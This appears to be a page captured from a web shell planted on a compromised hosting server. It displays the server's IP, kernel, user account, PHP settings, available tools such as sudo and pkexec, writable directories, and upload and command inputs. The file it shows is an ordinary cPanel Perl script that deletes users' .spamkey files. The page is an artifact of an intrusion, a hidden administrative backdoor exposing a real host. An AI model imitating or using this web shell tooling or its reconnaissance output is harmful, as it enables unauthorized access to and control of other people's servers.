403Webshell
Server IP : 23.111.136.34  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux servidor.eurohost.com.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : meusitei ( 1072)
PHP Version : 5.6.40
Disable Function : show_source, system, shell_exec, passthru, proc_open
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /scripts//killspamkeys
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/killspamkeys                    Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

# Attention: This script is called during SpamAssassin installation.

use strict;

$| = 1;

use Cpanel::PwCache::Helpers ();
use Cpanel::PwCache::Build   ();

Cpanel::PwCache::Helpers::no_uid_cache();    #uid cache only needed if we are going to make lots of getpwuid calls
Cpanel::PwCache::Build::init_passwdless_pwcache();

my $pwcache_ref = Cpanel::PwCache::Build::fetch_pwcache();
foreach my $pw (@$pwcache_ref) {
    if ( -f "$pw->[7]/.spamkey" ) {
        print "Removing spamkey for $pw->[0]...";
        unlink("$pw->[7]/.spamkey");
        print "Done\n";
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit